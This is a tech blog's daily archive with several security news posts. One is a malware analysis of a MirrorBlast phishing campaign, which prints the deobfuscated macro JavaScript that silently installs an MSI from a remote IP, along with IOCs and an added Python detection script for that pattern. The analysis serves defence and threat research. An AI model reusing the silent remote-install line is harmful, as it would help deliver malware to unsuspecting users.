Archive for October 15, 2021

Infographic: Small & Medium Business Trends Report

Posted in Commentary with tags on October 15, 2021 by itnerd

Salesforce’s annual Small Business Trends report with Canadian-specific data is out and it illustrates how small and medium-sized businesses navigated through the last year. They are embracing a digital-first world and are confident in future business success.

For instance, the past 18 months accelerated a number of innovations from SMB owners to digitize. Salesforce’s report found that:

  • 72% of SMBs believe operational shifts they’ve made to business operations over the past year will benefit their business long-term;
  • 81% of SMBs plan to offer contactless services permanently, such as secure payments (51%), digital customer service (42%) and e-commerce (35%); and
  • 90% of SMBs have moved a portion of their operations online in the past year.

Source: Salesforce

Darktrace Self-Learning AI Defends Organizations Across All 16 CISA Critical Infrastructure Sectors 

Posted in Commentary with tags on October 15, 2021 by itnerd

Darktrace today announced that its Self-Learning AI is defending organizations across all 16 critical infrastructure sectors designated by the Cybersecurity and Infrastructure Security Agency (CISA).

Within CISA, the Office of Infrastructure Protection leads efforts to manage risks to critical infrastructure, deeming them “essential to the economy, security, and sustainment of the American way of life.” Self-Learning AI has proved crucial in this mission. It augments human teams and takes autonomous action to detect and respond to threats against the country’s most sensitive systems and critical data at the earliest stages of an attack.

Self-Learning AI works by constantly evolving its understanding of both IT and operational technologies, allowing it to identify the subtle, emerging signs of a cyber-threat and take targeted action to interrupt encroaching attacks. These real-time alerts enable critical infrastructure organizations to continue business operations without disruption. 

The technology also allows defenders of critical infrastructure to achieve the Biden Administration’s goals outlined in the National Security Memorandum on Protecting Critical Infrastructure Control Systems, namely threat visibility, indications, detections, warnings, and facilitating response.

Darktrace Self-Learning AI has successfully fought back against insider threats, supply chain attacks, zero-day exploits, APTs as well as state-sponsored attacks across U.S. critical infrastructure industries. 

In May 2021, hackers hit Colonial Pipeline with ransomware, forcing the company to halt the pipeline’s total operations to contain the attack. In the same month, Darktrace AI detected, investigated, and contained a double extortion ransomware attack on a water and wastewater organization in North America. Unlike in the case of Colonial Pipeline, the attack was interrupted before hackers could demand any ransom payment or disrupt business operations. Darktrace catches ransomware and other security threats similar to this every day across all 16 sectors.

Research Highlights The Challenges In Securing The Cloud

Posted in Commentary with tags on October 15, 2021 by itnerd

451 Research released new findings titled “Modern Clouds Need a Novel Security Approach”, highlighting the challenges with fast-moving and increasing cloud security adoption and how to address them. Key findings include:

  • Cloud remains a significant gap for InfoSec
  • Security teams are looking to catch up in cloud expertise
  • Newer cloud security work is collaborative
  • Newer cloud deployment environments are increasingly automated
  • Centralized teams feel the brunt of multi-cloud and multi-platform

451 Research regularly reaches out to key IT stakeholders to research, among other things, different quantitative and qualitative aspects of their security programs. 451 Research found that having adequate knowledge of cloud platform capabilities and security controls topped the list of information security gaps for both 2019 (48%) and 2020 (41%). 

Gajraj Singh, Chief Marketing Officer, Blue Hexagon had this commentary:

“As security teams prepare to scale up expertise on securing cloud environments, we find it vital to require deep collaboration between cloud engineering and security. Security teams must be aware that they will need to support newer, faster processes, as well as new technology options, including a variety of cloud workloads, services, operating systems and serverless function execution. It is critical to cover the spectrum of security use cases along the entire lifecycle of building within the code development pipeline, deployment to cloud and runtime monitoring and enforcement.”

Seeing as more and more companies are moving some or all of their infrastructure to the cloud, it is vital that their InfoSec game be on point, or bad things will happen.

Guest Post: A New Phishing Campaign Drops MirrorBlast Malware Using Rebol-View Software

Posted in Commentary with tags on October 15, 2021 by itnerd

By Minerva Labs (www.minerva-labs.com)

MirrorBlast malware is a trojan known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on; however, it has now evolved additional capabilities that let it install other malware at the same time. Lately, this trojan is thought to have tentative links to the TA505 and PYSA groups.

Yesterday, a new MirrorBlast phishing campaign focused on German-speaking countries was discovered. A malicious Microsoft Excel file named “Bericht(entwurf).xls”, which translates to “Report (draft)”, was found to be used as a dropper of the MirrorBlast trojan. The Excel file requests the user to “Enable Content” which ultimately activates the macro embedded within the file:

Once the content is enabled, an Auto_Open macro is executed. The macro runs JavaScript code stored in the first cell of the sheet:

In the sample above, no anti-sandbox checks were included in the macro; however, several sources reported a different script that did contain such checks.

To see the JavaScript hidden in cell A1, the picture covering it had to be moved. This wasn’t possible at first, as the sheet was password protected:

This obstacle can be easily bypassed, for example using the script found here.

Below is the hidden malicious JavaScript:

Once deobfuscated, the JavaScript is: “with(new ActiveXObject("WindowsInstaller.Installer")){UILevel=2;InstallProduct("http://5.189.222[.]161")}”. It directly downloads a “load.msi” file from 5.189.222[.]161.

The .msi installs the Rebol-View software (a legitimate program) and executes a base64-encoded script. Here is how it looks after decoding:

The script collects data and communicates with the C&C server using the Rebol-View tool.
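The chain described above (cell-resident JScript driving the WindowsInstaller COM object, followed by a base64-encoded REBOL stage) is what a triage script can look for once the cell text and macro have been extracted. The Python below is an added example, not code from Minerva Labs or the original post; it assumes the extracted text is already available as a string, keeps the post’s defanged URL in its constructed sample, and assumes the dropped REBOL script carries the usual REBOL [...] header.

```python
import base64
import re

# Indicators taken from the deobfuscated macro payload quoted in the post.
INSTALLER_COM = re.compile(r"WindowsInstaller\.Installer", re.I)
INSTALL_PRODUCT = re.compile(r"InstallProduct\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
SILENT_UI = re.compile(r"UILevel\s*=\s*2", re.I)  # 2 = msiUILevelNone, no UI
# Long base64 runs are candidates for the encoded second-stage script.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def defang(url: str) -> str:
    """Render a URL safe to paste into a report (http -> hxxp, . -> [.])."""
    url = re.sub(r"^http", "hxxp", url, flags=re.I)
    return url.replace("[.]", ".").replace(".", "[.]")

def triage_cell_text(text: str) -> dict:
    """Check one chunk of extracted cell or macro text for the
    WindowsInstaller dropper pattern and return what was matched."""
    hits = []
    if INSTALLER_COM.search(text):
        hits.append("WindowsInstaller.Installer COM object")
    if SILENT_UI.search(text):
        hits.append("UILevel=2 (silent install, nothing shown to the user)")
    url = None
    match = INSTALL_PRODUCT.search(text)
    if match:
        url = defang(match.group(1))
        hits.append("InstallProduct() fetching a remote MSI")
    # Decode base64 candidates and look for a REBOL header; assumption:
    # the dropped script starts with the usual REBOL [...] header.
    for blob in B64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if b"REBOL" in decoded.upper():
            hits.append("base64-encoded REBOL script")
            break
    return {"suspicious": url is not None or len(hits) >= 2,
            "indicators": hits, "download_url": url}

# Constructed samples: the deobfuscated JScript from the post (URL kept
# defanged), a benign cell, and a base64 blob wrapping a dummy REBOL script.
DROPPER_JS = ('with(new ActiveXObject("WindowsInstaller.Installer"))'
              '{UILevel=2;InstallProduct("http://5.189.222[.]161")}')
BENIGN_TEXT = 'function total(a, b) { return a + b; }'
REBOL_B64 = base64.b64encode(b'REBOL [] print "constructed sample"').decode()
```

Feed it the strings produced by your own cell and VBA extraction (for example from oletools); the matches are meant as triage hints for an analyst, not as a verdict.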

REBOL is a “multi-paradigm dynamic programming language” that was designed for network communications and distributed computing. It is multi-platform, can run on any operating system (OS), and it introduced the idea of dialecting: small, optimized, domain-specific languages for code and data.

It can be used to program internet applications (client and server-side), database applications, utilities, and multimedia applications.

It is important to mention that REBOL itself is not a malicious program and has been used for many legitimate purposes. Recently, however, this tool was used as a C&C environment in several attacks; more information can be found here.

At the time of writing, the malicious Excel file was detected by only five AV engines.

Minerva Labs’ Malicious Document Prevention module prevents the drop of the initial-stage installer, stopping the attack at its very first stage, before it causes any damage.

IOCs

IPs and domains:

http://5.189.222[.]161

http://feristoaul[.]com – C&C server

Hashes:

Bericht(entwurf).xls – 7904e73defa12c220cdc04d059cfc8acf3ae96dad41c7bb26381f076f17004cf

load.msi – eceb164a69e8f79bb08099fcdf2b75071c527b0107daebc0e7a88e246b4c7f13

exemple.rb – 9c109c41d497cbe752edf56c1ac0e1ffb06357160b12100cc84eb2d4ddcb7b13

rebol-view-278-3-1.exe – 215e28f9660472b6271a9902573c9d190e4d7ccca33fcf8d6054941d52a3ab85

Guest Post: Fight Against Ransomware, Best Strategy for Cybersecurity

Posted in Commentary with tags on October 15, 2021 by itnerd

October is Cybersecurity Awareness Month and prevention should be atop every company’s priority list. With ransomware threats on the rise, Technologent’s Jon Mendoza, Chief Information Security Officer, and David Martinez, Security Practice Director, discuss how to prepare and be ready for a cyberattack.

Every news cycle seems to bring another story of a ransomware attack. Assaults on businesses are on the rise, and the statistics back it up. Since COVID-19 began in 2020, cybercrime has increased 600% and it is estimated that there is a cyberattack every 11 seconds around the world.(1) The increase in employees working from home has only intensified this threat in the eyes of many IT experts, with more than 80% reporting that remote workers are a ticking time bomb for corporations.(2) As part of a broader effort by the National Cyber Security Alliance and the U.S. Department of Homeland Security (DHS) to help Americans stay safer and more secure online, October has been designated Cybersecurity Awareness Month.(3)

Cybersecurity begins with being prepared, something too many companies are not proactive about, according to Technologent’s Chief Information Security Officer Jon Mendoza. “It starts with an understanding of the current state of your environment and specifically your security posture,” he explains. Bringing in a third party to conduct a security audit of a company’s IT system is a good place to start because this can recognize potential security gaps. Simulating an attack offers the opportunity for a company to gauge its response to different scenarios and to discover how the various parts of an organization would be affected and how they could respond. This type of drill would examine the impact on a company’s customers, as well as their ability to generate revenue and how quickly they could recover from a cybersecurity attack.

Mendoza cautions that simply focusing on technology is not enough. Any drills must factor in an organization’s people. “When you’re looking at the other aspects of what makes an organization vulnerable,” Mendoza says, “reducing risk is of critical importance, but understanding what those risks are is also important.” The risks will vary from organization to organization, and from sector to sector.

Addressing the human factor is critical and must focus on training and raising security awareness. Too many companies have fallen short in these areas despite having spent a lot of money on technology and security controls. However, they have not paid enough attention to how the end user is being trained. In terms of raising awareness, organizations cannot continue to do things as they have in the past. Cybersecurity threats are evolving, and the approach companies take must also change and adapt accordingly.

Too many companies, their CEOs, and their employees don’t view cybersecurity as their problem and instead deem it an issue for their IT departments. Case in point—intellectual property is at least as valuable as any other company asset—everyone needs to be trained to protect it to ensure the survival of their organization. Multifactor authentication and security awareness training both play a pivotal role in not only protecting intellectual property but also in teaching employees what their role is in security.

Ransomware, one of the most obvious aspects of cybersecurity and one that has been dominating the news, most often infiltrates a company via email. It has been estimated that one in every 6,000 emails contains something suspicious that could be ransomware(4) and that more than 90% of phishing emails contain ransomware.(5) While email has historically been the entry point for those using ransomware, the threat is evolving, with more attacks coming via mobile phones, where users are more likely to be distracted and click on a link without vetting it thoroughly.

The recent Colonial Pipeline breach offers an object lesson for handling a ransomware attack. One of the main pillars of good cybersecurity is having a good inventory of physical assets and all digital or cloud technology assets. David Martinez, Security Practice Director for Technologent, explains how the Colonial Pipeline was compromised due to poor endpoint protection deployment. “For half of the ransom they paid, Colonial Pipeline could get a phenomenal endpoint protection solution,” he says. “Prevention is a way more cost-effective means of handling cybersecurity.”

A cyberattack not only costs a company money, it also costs them in terms of their reputation, public trust, and social disruption—aspects of a company’s value that are challenging to quantify. In terms of the customer, the public’s awareness of the business and the nature of the business affect how the customer interaction comes into play for the financial loss and loss of trust the business may experience. The law covers not only the levy of fees and fines, it also involves public safety. The reaction in this area will also depend on the type of business involved. Finally, governance evaluates the sensitivity and criticality of the data that was breached. Criticality is the impact on business operations or the public at large; sensitivity is the nature of the data. 

From the end user to the CEO and from software to third-party evaluators, all parties must give their full participation. Cybercriminals may continue to find new ways of attack, but companies can be prepared—the key is information, awareness of possible gaps in their IT security, and taking proactive measures to protect themselves.

“The silver lining in all these things happening in the news is that it has really put a spotlight on the problem,” Mendoza observes. “Historically, most organizations have not necessarily funded their security programs appropriately, but that is changing.”

About Technologent:

Technologent is a Global Provider of Edge-to-Edge™ Information Technology Solutions and Services for Fortune 1000 companies. They help companies outpace the new digital economy by creating IT environments that are fast, flexible, efficient, transparent and secure. Without these characteristics, companies will miss the opportunity to optimally scale. Technologent mobilizes the power of technology to turn vision into reality, enabling a focus on driving innovation, increasing productivity and outperforming the market. Visit www.technologent.com.

  1. Embroker Team; “202 Must Know Cyber Attack Statistics and Trends”; Embroker; August 11, 2021; embroker.com/blog/cyber-attack-statistics/
  2. Gately, Edward; “HP Wolf Security: Employees Pushing Back Against Efforts to Improve Security”; Channel Futures; September 9, 2021; channelfutures.com/channel-research/hp-wolf-security-employees-pushing-back-against-efforts-to-improve-security
  3. “About Cybersecurity Awareness Month”; accessed October 1, 2021; staysafeonline.org/cybersecurity-awareness-month/about-the-month
  4. Morgan, Steve; “Global Ransomware Damage Costs Predicted To Reach $20 Billion (USD) By 2021”; Cybercrime Magazine; October 21, 2019; cybersecurityventures.com/global-ransomware-damage-costs-predicted-to-reach-20-billion-usd-by-2021/
  5. Korolov, Maria; “93% of phishing emails are now ransomware”; CSO; June 1, 2016; csoonline.com/article/3077434/93-of-phishing-emails-are-now-ransomware.html

Acer Has Been Pwned Again… And This Time Customer Data Has Been Stolen

Posted in Commentary with tags on October 15, 2021 by itnerd

Back in March, the news surfaced that computer maker Acer got pwned by hackers in the form of a ransomware attack. Fast forward to today and it has happened again. This time hackers have made off with more than 60 gigabytes of data:

Acer has confirmed that names, addresses, and phone numbers belonging to several million clients have been compromised in the breach, as well as sensitive corporate financial and audit details. If nothing else, this is certainly bad optics for Acer, which earlier this year was on the receiving end of a massive $50 million ransomware campaign. As proof of the data theft, the ransomware gang posted a bunch of stolen files on the REvil website, including financial spreadsheets, bank balances, and bank communications. It was never made clear if this was partially the result of Microsoft Exchange vulnerabilities that had been used before then by Chinese hackers. In any event, now, several months later, hacking group Desorden said it has infiltrated Acer’s servers in India and swiped data relating to “millions” of customers.

Well, this is the worst-case scenario. This data can be used to launch other attacks, steal identities, and so on, making this a non-trivial event. What makes it worse is that Acer clearly has not learned from what happened in March, which means you can fully expect other hacker groups to target the company.

So knowing all of this, would you buy an Acer computer? I would think twice.